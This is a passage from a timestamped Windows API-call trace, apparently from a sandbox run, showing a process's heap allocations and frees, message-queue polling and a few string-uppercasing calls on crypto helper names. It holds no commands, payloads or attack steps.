hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0246.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0246.929] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0246.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0246.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0246.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0246.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0246.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0246.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0246.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0246.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15660) returned 0x2ea9ff0 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0246.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0246.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0246.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0246.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0246.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15660) returned 0x2ebf658 [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9ff0 | out: hHeap=0x970000) returned 1 [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0246.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.933] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0246.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0246.933] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.934] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0246.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0246.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0246.934] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0246.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0246.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0246.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0246.935] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.935] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0246.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ed8 [0246.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ed8 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0246.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0246.935] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0246.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0246.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0246.936] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0246.936] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15660) returned 0x2ea9ff0 [0246.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15660) returned 0x2ed4cc0 [0246.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9ff0 | out: hHeap=0x970000) returned 1 [0246.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0246.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15660) returned 0x2ea9ff0 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed4cc0 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0246.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15660) returned 0x2ed4cc0 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9ff0 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94988 | out: hHeap=0x970000) returned 1 [0246.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0246.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0246.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0246.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0246.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebf658 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree 